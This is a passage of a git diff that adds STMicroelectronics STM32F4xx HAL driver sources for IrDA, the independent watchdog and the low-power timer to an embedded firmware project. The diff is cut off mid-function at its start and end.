hirda->hdmarx->XferAbortCallback = NULL; + + /* Check if an Abort process is still ongoing */ + if (hirda->hdmatx != NULL) + { + if (hirda->hdmatx->XferAbortCallback != NULL) + { + return; + } + } + + /* No Abort process still ongoing : All DMA channels are aborted, call user Abort Complete callback */ + hirda->TxXferCount = 0x00U; + hirda->RxXferCount = 0x00U; + + /* Reset ErrorCode */ + hirda->ErrorCode = HAL_IRDA_ERROR_NONE; + + /* Restore hirda->gState and hirda->RxState to Ready */ + hirda->gState = HAL_IRDA_STATE_READY; + hirda->RxState = HAL_IRDA_STATE_READY; + + /* Call user Abort complete callback */ +#if (USE_HAL_IRDA_REGISTER_CALLBACKS == 1) + /* Call registered Abort complete callback */ + hirda->AbortCpltCallback(hirda); +#else + /* Call legacy weak Abort complete callback */ + HAL_IRDA_AbortCpltCallback(hirda); +#endif /* USE_HAL_IRDA_REGISTER_CALLBACK */ +} + +/** + * @brief DMA IRDA Tx communication abort callback, when initiated by user by a call to + * HAL_IRDA_AbortTransmit_IT API (Abort only Tx transfer) + * (This callback is executed at end of DMA Tx Abort procedure following user abort request, + * and leads to user Tx Abort Complete callback execution). + * @param hdma DMA handle. + * @retval None + */ +static void IRDA_DMATxOnlyAbortCallback(DMA_HandleTypeDef *hdma) +{ + IRDA_HandleTypeDef *hirda = (IRDA_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + hirda->TxXferCount = 0x00U; + + /* Restore hirda->gState to Ready */ + hirda->gState = HAL_IRDA_STATE_READY; + + /* Call user Abort complete callback */ +#if (USE_HAL_IRDA_REGISTER_CALLBACKS == 1) + /* Call registered Abort Transmit Complete Callback */ + hirda->AbortTransmitCpltCallback(hirda); +#else + /* Call legacy weak Abort Transmit Complete Callback */ + HAL_IRDA_AbortTransmitCpltCallback(hirda); +#endif /* USE_HAL_IRDA_REGISTER_CALLBACK */ +} + +/** + * @brief DMA IRDA Rx communication abort callback, when initiated by user by a call to + * HAL_IRDA_AbortReceive_IT API (Abort only Rx transfer) + * (This callback is executed at end of DMA Rx Abort procedure following user abort request, + * and leads to user Rx Abort Complete callback execution). + * @param hdma DMA handle. + * @retval None + */ +static void IRDA_DMARxOnlyAbortCallback(DMA_HandleTypeDef *hdma) +{ + IRDA_HandleTypeDef *hirda = (IRDA_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + hirda->RxXferCount = 0x00U; + + /* Restore hirda->RxState to Ready */ + hirda->RxState = HAL_IRDA_STATE_READY; + + /* Call user Abort complete callback */ +#if (USE_HAL_IRDA_REGISTER_CALLBACKS == 1) + /* Call registered Abort Receive Complete Callback */ + hirda->AbortReceiveCpltCallback(hirda); +#else + /* Call legacy weak Abort Receive Complete Callback */ + HAL_IRDA_AbortReceiveCpltCallback(hirda); +#endif /* USE_HAL_IRDA_REGISTER_CALLBACK */ +} + +/** + * @brief Send an amount of data in non blocking mode. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA module. + * @retval HAL status + */ +static HAL_StatusTypeDef IRDA_Transmit_IT(IRDA_HandleTypeDef *hirda) +{ + uint16_t *tmp; + + /* Check that a Tx process is ongoing */ + if (hirda->gState == HAL_IRDA_STATE_BUSY_TX) + { + if (hirda->Init.WordLength == IRDA_WORDLENGTH_9B) + { + tmp = (uint16_t *) hirda->pTxBuffPtr; + hirda->Instance->DR = (uint16_t)(*tmp & (uint16_t)0x01FF); + if (hirda->Init.Parity == IRDA_PARITY_NONE) + { + hirda->pTxBuffPtr += 2U; + } + else + { + hirda->pTxBuffPtr += 1U; + } + } + else + { + hirda->Instance->DR = (uint8_t)(*hirda->pTxBuffPtr++ & (uint8_t)0x00FF); + } + + if (--hirda->TxXferCount == 0U) + { + /* Disable the IRDA Transmit Data Register Empty Interrupt */ + CLEAR_BIT(hirda->Instance->CR1, USART_CR1_TXEIE); + + /* Enable the IRDA Transmit Complete Interrupt */ + SET_BIT(hirda->Instance->CR1, USART_CR1_TCIE); + } + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Wraps up transmission in non blocking mode. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA module. + * @retval HAL status + */ +static HAL_StatusTypeDef IRDA_EndTransmit_IT(IRDA_HandleTypeDef *hirda) +{ + /* Disable the IRDA Transmit Complete Interrupt */ + CLEAR_BIT(hirda->Instance->CR1, USART_CR1_TCIE); + + /* Disable the IRDA Error Interrupt: (Frame error, noise error, overrun error) */ + CLEAR_BIT(hirda->Instance->CR3, USART_CR3_EIE); + + /* Tx process is ended, restore hirda->gState to Ready */ + hirda->gState = HAL_IRDA_STATE_READY; + +#if (USE_HAL_IRDA_REGISTER_CALLBACKS == 1) + /* Call registered Tx complete callback */ + hirda->TxCpltCallback(hirda); +#else + /* Call legacy weak Tx complete callback */ + HAL_IRDA_TxCpltCallback(hirda); +#endif /* USE_HAL_IRDA_REGISTER_CALLBACK */ + + return HAL_OK; +} + +/** + * @brief Receives an amount of data in non blocking mode. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA module. + * @retval HAL status + */ +static HAL_StatusTypeDef IRDA_Receive_IT(IRDA_HandleTypeDef *hirda) +{ + uint16_t *tmp; + uint16_t uhdata; + + /* Check that a Rx process is ongoing */ + if (hirda->RxState == HAL_IRDA_STATE_BUSY_RX) + { + uhdata = (uint16_t) READ_REG(hirda->Instance->DR); + if (hirda->Init.WordLength == IRDA_WORDLENGTH_9B) + { + tmp = (uint16_t *) hirda->pRxBuffPtr; + if (hirda->Init.Parity == IRDA_PARITY_NONE) + { + *tmp = (uint16_t)(uhdata & (uint16_t)0x01FF); + hirda->pRxBuffPtr += 2U; + } + else + { + *tmp = (uint16_t)(uhdata & (uint16_t)0x00FF); + hirda->pRxBuffPtr += 1U; + } + } + else + { + if (hirda->Init.Parity == IRDA_PARITY_NONE) + { + *hirda->pRxBuffPtr++ = (uint8_t)(uhdata & (uint8_t)0x00FF); + } + else + { + *hirda->pRxBuffPtr++ = (uint8_t)(uhdata & (uint8_t)0x007F); + } + } + + if (--hirda->RxXferCount == 0U) + { + /* Disable the IRDA Data Register not empty Interrupt */ + CLEAR_BIT(hirda->Instance->CR1, USART_CR1_RXNEIE); + + /* Disable the IRDA Parity Error Interrupt */ + CLEAR_BIT(hirda->Instance->CR1, USART_CR1_PEIE); + + /* Disable the IRDA Error Interrupt: (Frame error, noise error, overrun error) */ + CLEAR_BIT(hirda->Instance->CR3, USART_CR3_EIE); + + /* Rx process is completed, restore hirda->RxState to Ready */ + hirda->RxState = HAL_IRDA_STATE_READY; + +#if (USE_HAL_IRDA_REGISTER_CALLBACKS == 1) + /* Call registered Rx complete callback */ + hirda->RxCpltCallback(hirda); +#else + /* Call legacy weak Rx complete callback */ + HAL_IRDA_RxCpltCallback(hirda); +#endif /* USE_HAL_IRDA_REGISTER_CALLBACKS */ + + return HAL_OK; + } + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Configures the IRDA peripheral. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA module. + * @retval None + */ +static void IRDA_SetConfig(IRDA_HandleTypeDef *hirda) +{ + uint32_t pclk; + + /* Check the parameters */ + assert_param(IS_IRDA_INSTANCE(hirda->Instance)); + assert_param(IS_IRDA_BAUDRATE(hirda->Init.BaudRate)); + assert_param(IS_IRDA_WORD_LENGTH(hirda->Init.WordLength)); + assert_param(IS_IRDA_PARITY(hirda->Init.Parity)); + assert_param(IS_IRDA_MODE(hirda->Init.Mode)); + assert_param(IS_IRDA_POWERMODE(hirda->Init.IrDAMode)); + + /*-------------------------- USART CR2 Configuration ------------------------*/ + /* Clear STOP[13:12] bits */ + CLEAR_BIT(hirda->Instance->CR2, USART_CR2_STOP); + + /*-------------------------- USART CR1 Configuration -----------------------*/ + /* Clear M, PCE, PS, TE and RE bits */ + CLEAR_BIT(hirda->Instance->CR1, (USART_CR1_M | USART_CR1_PCE | USART_CR1_PS | USART_CR1_TE | USART_CR1_RE)); + + /* Configure the USART Word Length, Parity and mode: + Set the M bits according to hirda->Init.WordLength value + Set PCE and PS bits according to hirda->Init.Parity value + Set TE and RE bits according to hirda->Init.Mode value */ + /* Write to USART CR1 */ + SET_BIT(hirda->Instance->CR1, (hirda->Init.WordLength | hirda->Init.Parity | hirda->Init.Mode)); + + /*-------------------------- USART CR3 Configuration -----------------------*/ + /* Clear CTSE and RTSE bits */ + CLEAR_BIT(hirda->Instance->CR3, (USART_CR3_RTSE | USART_CR3_CTSE)); + + /*-------------------------- USART BRR Configuration -----------------------*/ +#if defined(USART6) && defined(UART9) && defined(UART10) + if ((hirda->Instance == USART1) || (hirda->Instance == USART6) || (hirda->Instance == UART9) || (hirda->Instance == UART10)) + { + pclk = HAL_RCC_GetPCLK2Freq(); + SET_BIT(hirda->Instance->BRR, IRDA_BRR(pclk, hirda->Init.BaudRate)); + } +#elif defined(USART6) + if((hirda->Instance == USART1) || (hirda->Instance == USART6)) + { + pclk = HAL_RCC_GetPCLK2Freq(); + SET_BIT(hirda->Instance->BRR, IRDA_BRR(pclk, hirda->Init.BaudRate)); + } +#else + if(hirda->Instance == USART1) + { + pclk = HAL_RCC_GetPCLK2Freq(); + SET_BIT(hirda->Instance->BRR, IRDA_BRR(pclk, hirda->Init.BaudRate)); + } +#endif /* USART6 */ + else + { + pclk = HAL_RCC_GetPCLK1Freq(); + SET_BIT(hirda->Instance->BRR, IRDA_BRR(pclk, hirda->Init.BaudRate)); + } +} + +/** + * @} + */ + +#endif /* HAL_IRDA_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_iwdg.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_iwdg.c new file mode 100644 index 000000000..5f376dac6 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_iwdg.c @@ -0,0 +1,265 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_iwdg.c + * @author MCD Application Team + * @brief IWDG HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the Independent Watchdog (IWDG) peripheral: + * + Initialization and Start functions + * + IO operation functions + * + @verbatim + ============================================================================== + ##### IWDG Generic features ##### + ============================================================================== + [..] + (+) The IWDG can be started by either software or hardware (configurable + through option byte). + + (+) The IWDG is clocked by the Low-Speed Internal clock (LSI) and thus stays + active even if the main clock fails. + + (+) Once the IWDG is started, the LSI is forced ON and both cannot be + disabled. The counter starts counting down from the reset value (0xFFF). + When it reaches the end of count value (0x000) a reset signal is + generated (IWDG reset). + + (+) Whenever the key value 0x0000 AAAA is written in the IWDG_KR register, + the IWDG_RLR value is reloaded into the counter and the watchdog reset + is prevented. + + (+) The IWDG is implemented in the VDD voltage domain that is still functional + in STOP and STANDBY mode (IWDG reset can wake up the CPU from STANDBY). + IWDGRST flag in RCC_CSR register can be used to inform when an IWDG + reset occurs. + + (+) Debug mode: When the microcontroller enters debug mode (core halted), + the IWDG counter either continues to work normally or stops, depending + on DBG_IWDG_STOP configuration bit in DBG module, accessible through + __HAL_DBGMCU_FREEZE_IWDG() and __HAL_DBGMCU_UNFREEZE_IWDG() macros. + + [..] Min-max timeout value @32KHz (LSI): ~125us / ~32.7s + The IWDG timeout may vary due to LSI clock frequency dispersion. + STM32F4xx devices provide the capability to measure the LSI clock + frequency (LSI clock is internally connected to TIM5 CH4 input capture). + The measured value can be used to have an IWDG timeout with an + acceptable accuracy. + + [..] Default timeout value (necessary for IWDG_SR status register update): + Constant LSI_VALUE is defined based on the nominal LSI clock frequency. + This frequency being subject to variations as mentioned above, the + default timeout value (defined through constant HAL_IWDG_DEFAULT_TIMEOUT + below) may become too short or too long. + In such cases, this default timeout value can be tuned by redefining + the constant LSI_VALUE at user-application level (based, for instance, + on the measured LSI clock frequency as explained above). + + ##### How to use this driver ##### + ============================================================================== + [..] + (#) Use IWDG using HAL_IWDG_Init() function to : + (++) Enable instance by writing Start keyword in IWDG_KEY register. LSI + clock is forced ON and IWDG counter starts counting down. + (++) Enable write access to configuration registers: + IWDG_PR and IWDG_RLR. + (++) Configure the IWDG prescaler and counter reload value. This reload + value will be loaded in the IWDG counter each time the watchdog is + reloaded, then the IWDG will start counting down from this value. + (++) Wait for status flags to be reset. + + (#) Then the application program must refresh the IWDG counter at regular + intervals during normal operation to prevent an MCU reset, using + HAL_IWDG_Refresh() function. + + *** IWDG HAL driver macros list *** + ==================================== + [..] + Below the list of most used macros in IWDG HAL driver: + (+) __HAL_IWDG_START: Enable the IWDG peripheral + (+) __HAL_IWDG_RELOAD_COUNTER: Reloads IWDG counter with value defined in + the reload register + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +#ifdef HAL_IWDG_MODULE_ENABLED +/** @addtogroup IWDG + * @brief IWDG HAL module driver. + * @{ + */ + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @defgroup IWDG_Private_Defines IWDG Private Defines + * @{ + */ +/* Status register needs up to 5 LSI clock periods divided by the clock + prescaler to be updated. The number of LSI clock periods is upper-rounded to + 6 for the timeout value calculation. + The timeout value is calculated using the highest prescaler (256) and + the LSI_VALUE constant. The value of this constant can be changed by the user + to take into account possible LSI clock period variations. + The timeout value is multiplied by 1000 to be converted in milliseconds. + LSI startup time is also considered here by adding LSI_STARTUP_TIMEOUT + converted in milliseconds. */ +#define HAL_IWDG_DEFAULT_TIMEOUT (((6UL * 256UL * 1000UL) / LSI_VALUE) + ((LSI_STARTUP_TIME / 1000UL) + 1UL)) +#define IWDG_KERNEL_UPDATE_FLAGS (IWDG_SR_RVU | IWDG_SR_PVU) +/** + * @} + */ + +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Exported functions --------------------------------------------------------*/ + +/** @addtogroup IWDG_Exported_Functions + * @{ + */ + +/** @addtogroup IWDG_Exported_Functions_Group1 + * @brief Initialization and Start functions. + * +@verbatim + =============================================================================== + ##### Initialization and Start functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Initialize the IWDG according to the specified parameters in the + IWDG_InitTypeDef of associated handle. + (+) Once initialization is performed in HAL_IWDG_Init function, Watchdog + is reloaded in order to exit function with correct time base. + +@endverbatim + * @{ + */ + +/** + * @brief Initialize the IWDG according to the specified parameters in the + * IWDG_InitTypeDef and start watchdog. Before exiting function, + * watchdog is refreshed in order to have correct time base. + * @param hiwdg pointer to a IWDG_HandleTypeDef structure that contains + * the configuration information for the specified IWDG module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_IWDG_Init(IWDG_HandleTypeDef *hiwdg) +{ + uint32_t tickstart; + + /* Check the IWDG handle allocation */ + if (hiwdg == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_IWDG_ALL_INSTANCE(hiwdg->Instance)); + assert_param(IS_IWDG_PRESCALER(hiwdg->Init.Prescaler)); + assert_param(IS_IWDG_RELOAD(hiwdg->Init.Reload)); + + /* Enable IWDG. LSI is turned on automatically */ + __HAL_IWDG_START(hiwdg); + + /* Enable write access to IWDG_PR and IWDG_RLR registers by writing + 0x5555 in KR */ + IWDG_ENABLE_WRITE_ACCESS(hiwdg); + + /* Write to IWDG registers the Prescaler & Reload values to work with */ + hiwdg->Instance->PR = hiwdg->Init.Prescaler; + hiwdg->Instance->RLR = hiwdg->Init.Reload; + + /* Check pending flag, if previous update not done, return timeout */ + tickstart = HAL_GetTick(); + + /* Wait for register to be updated */ + while ((hiwdg->Instance->SR & IWDG_KERNEL_UPDATE_FLAGS) != 0x00u) + { + if ((HAL_GetTick() - tickstart) > HAL_IWDG_DEFAULT_TIMEOUT) + { + if ((hiwdg->Instance->SR & IWDG_KERNEL_UPDATE_FLAGS) != 0x00u) + { + return HAL_TIMEOUT; + } + } + } + + /* Reload IWDG counter with value defined in the reload register */ + __HAL_IWDG_RELOAD_COUNTER(hiwdg); + + /* Return function status */ + return HAL_OK; +} + + +/** + * @} + */ + + +/** @addtogroup IWDG_Exported_Functions_Group2 + * @brief IO operation functions + * +@verbatim + =============================================================================== + ##### IO operation functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Refresh the IWDG. + +@endverbatim + * @{ + */ + +/** + * @brief Refresh the IWDG. + * @param hiwdg pointer to a IWDG_HandleTypeDef structure that contains + * the configuration information for the specified IWDG module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_IWDG_Refresh(IWDG_HandleTypeDef *hiwdg) +{ + /* Reload IWDG counter with value defined in the reload register */ + __HAL_IWDG_RELOAD_COUNTER(hiwdg); + + /* Return function status */ + return HAL_OK; +} + + +/** + * @} + */ + +/** + * @} + */ + +#endif /* HAL_IWDG_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_lptim.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_lptim.c new file mode 100644 index 000000000..0ed761721 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_lptim.c @@ -0,0 +1,2479 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_lptim.c + * @author MCD Application Team + * @brief LPTIM HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the Low Power Timer (LPTIM) peripheral: + * + Initialization and de-initialization functions. + * + Start/Stop operation functions in polling mode. + * + Start/Stop operation functions in interrupt mode. + * + Reading operation functions. + * + Peripheral State functions. + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + The LPTIM HAL driver can be used as follows: + + (#)Initialize the LPTIM low level resources by implementing the + HAL_LPTIM_MspInit(): + (++) Enable the LPTIM interface clock using __HAL_RCC_LPTIMx_CLK_ENABLE(). + (++) In case of using interrupts (e.g. HAL_LPTIM_PWM_Start_IT()): + (+++) Configure the LPTIM interrupt priority using HAL_NVIC_SetPriority(). + (+++) Enable the LPTIM IRQ handler using HAL_NVIC_EnableIRQ(). + (+++) In LPTIM IRQ handler, call HAL_LPTIM_IRQHandler(). + + (#)Initialize the LPTIM HAL using HAL_LPTIM_Init(). This function + configures mainly: + (++) The instance: LPTIM1. + (++) Clock: the counter clock. + (+++) Source : it can be either the ULPTIM input (IN1) or one of + the internal clock; (APB, LSE or LSI). + (+++) Prescaler: select the clock divider. + (++) UltraLowPowerClock : To be used only if the ULPTIM is selected + as counter clock source. + (+++) Polarity: polarity of the active edge for the counter unit + if the ULPTIM input is selected. + (+++) SampleTime: clock sampling time to configure the clock glitch + filter. + (++) Trigger: How the counter start. + (+++) Source: trigger can be software or one of the hardware triggers. + (+++) ActiveEdge : only for hardware trigger. + (+++) SampleTime : trigger sampling time to configure the trigger + glitch filter. + (++) OutputPolarity : 2 opposite polarities are possible. + (++) UpdateMode: specifies whether the update of the autoreload and + the compare values is done immediately or after the end of current + period. + + (#)Six modes are available: + + (++) PWM Mode: To generate a PWM signal with specified period and pulse, + call HAL_LPTIM_PWM_Start() or HAL_LPTIM_PWM_Start_IT() for interruption + mode. + + (++) One Pulse Mode: To generate pulse with specified width in response + to a stimulus, call HAL_LPTIM_OnePulse_Start() or + HAL_LPTIM_OnePulse_Start_IT() for interruption mode. + + (++) Set once Mode: In this mode, the output changes the level (from + low level to high level if the output polarity is configured high, else + the opposite) when a compare match occurs. To start this mode, call + HAL_LPTIM_SetOnce_Start() or HAL_LPTIM_SetOnce_Start_IT() for + interruption mode. + + (++) Encoder Mode: To use the encoder interface call + HAL_LPTIM_Encoder_Start() or HAL_LPTIM_Encoder_Start_IT() for + interruption mode. Only available for LPTIM1 instance. + + (++) Time out Mode: an active edge on one selected trigger input rests + the counter. The first trigger event will start the timer, any + successive trigger event will reset the counter and the timer will + restart. To start this mode call HAL_LPTIM_TimeOut_Start_IT() or + HAL_LPTIM_TimeOut_Start_IT() for interruption mode. + + (++) Counter Mode: counter can be used to count external events on + the LPTIM Input1 or it can be used to count internal clock cycles. + To start this mode, call HAL_LPTIM_Counter_Start() or + HAL_LPTIM_Counter_Start_IT() for interruption mode. + + + (#) User can stop any process by calling the corresponding API: + HAL_LPTIM_Xxx_Stop() or HAL_LPTIM_Xxx_Stop_IT() if the process is + already started in interruption mode. + + (#) De-initialize the LPTIM peripheral using HAL_LPTIM_DeInit(). + + *** Callback registration *** + ============================================= + [..] + The compilation define USE_HAL_LPTIM_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + [..] + Use Function HAL_LPTIM_RegisterCallback() to register a callback. + HAL_LPTIM_RegisterCallback() takes as parameters the HAL peripheral handle, + the Callback ID and a pointer to the user callback function. + [..] + Use function HAL_LPTIM_UnRegisterCallback() to reset a callback to the + default weak function. + HAL_LPTIM_UnRegisterCallback takes as parameters the HAL peripheral handle, + and the Callback ID. + [..] + These functions allow to register/unregister following callbacks: + + (+) MspInitCallback : LPTIM Base Msp Init Callback. + (+) MspDeInitCallback : LPTIM Base Msp DeInit Callback. + (+) CompareMatchCallback : Compare match Callback. + (+) AutoReloadMatchCallback : Auto-reload match Callback. + (+) TriggerCallback : External trigger event detection Callback. + (+) CompareWriteCallback : Compare register write complete Callback. + (+) AutoReloadWriteCallback : Auto-reload register write complete Callback. + (+) DirectionUpCallback : Up-counting direction change Callback. + (+) DirectionDownCallback : Down-counting direction change Callback. + + [..] + By default, after the Init and when the state is HAL_LPTIM_STATE_RESET + all interrupt callbacks are set to the corresponding weak functions: + examples HAL_LPTIM_TriggerCallback(), HAL_LPTIM_CompareMatchCallback(). + + [..] + Exception done for MspInit and MspDeInit functions that are reset to the legacy weak + functionalities in the Init/DeInit only when these callbacks are null + (not registered beforehand). If not, MspInit or MspDeInit are not null, the Init/DeInit + keep and use the user MspInit/MspDeInit callbacks (registered beforehand) + + [..] + Callbacks can be registered/unregistered in HAL_LPTIM_STATE_READY state only. + Exception done MspInit/MspDeInit that can be registered/unregistered + in HAL_LPTIM_STATE_READY or HAL_LPTIM_STATE_RESET state, + thus registered (user) MspInit/DeInit callbacks can be used during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using HAL_LPTIM_RegisterCallback() before calling DeInit or Init function. + + [..] + When The compilation define USE_HAL_LPTIM_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registration feature is not available and all callbacks + are set to the corresponding weak functions. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup LPTIM LPTIM + * @brief LPTIM HAL module driver. + * @{ + */ + +#ifdef HAL_LPTIM_MODULE_ENABLED + +#if defined (LPTIM1) + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @addtogroup LPTIM_Private_Constants + * @{ + */ +#define TIMEOUT 1000UL /* Timeout is 1s */ +/** + * @} + */ + +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +#if (USE_HAL_LPTIM_REGISTER_CALLBACKS == 1) +static void LPTIM_ResetCallback(LPTIM_HandleTypeDef *lptim); +#endif /* USE_HAL_LPTIM_REGISTER_CALLBACKS */ +static HAL_StatusTypeDef LPTIM_WaitForFlag(LPTIM_HandleTypeDef *hlptim, uint32_t flag); + +/* Exported functions --------------------------------------------------------*/ + +/** @defgroup LPTIM_Exported_Functions LPTIM Exported Functions + * @{ + */ + +/** @defgroup LPTIM_Exported_Functions_Group1 Initialization/de-initialization functions + * @brief Initialization and Configuration functions. + * +@verbatim + ============================================================================== + ##### Initialization and de-initialization functions ##### + ============================================================================== + [..] This section provides functions allowing to: + (+) Initialize the LPTIM according to the specified parameters in the + LPTIM_InitTypeDef and initialize the associated handle. + (+) DeInitialize the LPTIM peripheral. + (+) Initialize the LPTIM MSP. + (+) DeInitialize the LPTIM MSP. + +@endverbatim + * @{ + */ + +/** + * @brief Initialize the LPTIM according to the specified parameters in the + * LPTIM_InitTypeDef and initialize the associated handle. + * @param hlptim LPTIM handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_Init(LPTIM_HandleTypeDef *hlptim) +{ + uint32_t tmpcfgr; + + /* Check the LPTIM handle allocation */ + if (hlptim == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + + assert_param(IS_LPTIM_CLOCK_SOURCE(hlptim->Init.Clock.Source)); + assert_param(IS_LPTIM_CLOCK_PRESCALER(hlptim->Init.Clock.Prescaler)); + if ((hlptim->Init.Clock.Source == LPTIM_CLOCKSOURCE_ULPTIM) + || (hlptim->Init.CounterSource == LPTIM_COUNTERSOURCE_EXTERNAL)) + { + assert_param(IS_LPTIM_CLOCK_POLARITY(hlptim->Init.UltraLowPowerClock.Polarity)); + assert_param(IS_LPTIM_CLOCK_SAMPLE_TIME(hlptim->Init.UltraLowPowerClock.SampleTime)); + } + assert_param(IS_LPTIM_TRG_SOURCE(hlptim->Init.Trigger.Source)); + if (hlptim->Init.Trigger.Source != LPTIM_TRIGSOURCE_SOFTWARE) + { + assert_param(IS_LPTIM_EXT_TRG_POLARITY(hlptim->Init.Trigger.ActiveEdge)); + assert_param(IS_LPTIM_TRIG_SAMPLE_TIME(hlptim->Init.Trigger.SampleTime)); + } + assert_param(IS_LPTIM_OUTPUT_POLARITY(hlptim->Init.OutputPolarity)); + assert_param(IS_LPTIM_UPDATE_MODE(hlptim->Init.UpdateMode)); + assert_param(IS_LPTIM_COUNTER_SOURCE(hlptim->Init.CounterSource)); + + if (hlptim->State == HAL_LPTIM_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hlptim->Lock = HAL_UNLOCKED; + +#if (USE_HAL_LPTIM_REGISTER_CALLBACKS == 1) + /* Reset interrupt callbacks to legacy weak callbacks */ + LPTIM_ResetCallback(hlptim); + + if (hlptim->MspInitCallback == NULL) + { + hlptim->MspInitCallback = HAL_LPTIM_MspInit; + } + + /* Init the low level hardware : GPIO, CLOCK, NVIC */ + hlptim->MspInitCallback(hlptim); +#else + /* Init the low level hardware : GPIO, CLOCK, NVIC */ + HAL_LPTIM_MspInit(hlptim); +#endif /* USE_HAL_LPTIM_REGISTER_CALLBACKS */ + } + + /* Change the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; + + /* Get the LPTIMx CFGR value */ + tmpcfgr = hlptim->Instance->CFGR; + + if ((hlptim->Init.Clock.Source == LPTIM_CLOCKSOURCE_ULPTIM) + || (hlptim->Init.CounterSource == LPTIM_COUNTERSOURCE_EXTERNAL)) + { + tmpcfgr &= (uint32_t)(~(LPTIM_CFGR_CKPOL | LPTIM_CFGR_CKFLT)); + } + if (hlptim->Init.Trigger.Source != LPTIM_TRIGSOURCE_SOFTWARE) + { + tmpcfgr &= (uint32_t)(~(LPTIM_CFGR_TRGFLT | LPTIM_CFGR_TRIGSEL)); + } + + /* Clear CKSEL, PRESC, TRIGEN, TRGFLT, WAVPOL, PRELOAD & COUNTMODE bits */ + tmpcfgr &= (uint32_t)(~(LPTIM_CFGR_CKSEL | LPTIM_CFGR_TRIGEN | LPTIM_CFGR_PRELOAD | + LPTIM_CFGR_WAVPOL | LPTIM_CFGR_PRESC | LPTIM_CFGR_COUNTMODE)); + + /* Set initialization parameters */ + tmpcfgr |= (hlptim->Init.Clock.Source | + hlptim->Init.Clock.Prescaler | + hlptim->Init.OutputPolarity | + hlptim->Init.UpdateMode | + hlptim->Init.CounterSource); + + /* Glitch filters for internal triggers and external inputs are configured + * only if an internal clock source is provided to the LPTIM + */ + if (hlptim->Init.Clock.Source == LPTIM_CLOCKSOURCE_APBCLOCK_LPOSC) + { + tmpcfgr |= (hlptim->Init.Trigger.SampleTime | + hlptim->Init.UltraLowPowerClock.SampleTime); + } + + /* Configure LPTIM external clock polarity and digital filter */ + if ((hlptim->Init.Clock.Source == LPTIM_CLOCKSOURCE_ULPTIM) + || (hlptim->Init.CounterSource == LPTIM_COUNTERSOURCE_EXTERNAL)) + { + tmpcfgr |= (hlptim->Init.UltraLowPowerClock.Polarity | + hlptim->Init.UltraLowPowerClock.SampleTime); + } + + /* Configure LPTIM external trigger */ + if (hlptim->Init.Trigger.Source != LPTIM_TRIGSOURCE_SOFTWARE) + { + /* Enable External trigger and set the trigger source */ + tmpcfgr |= (hlptim->Init.Trigger.Source | + hlptim->Init.Trigger.ActiveEdge | + hlptim->Init.Trigger.SampleTime); + } + + /* Write to LPTIMx CFGR */ + hlptim->Instance->CFGR = tmpcfgr; + + /* Change the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief DeInitialize the 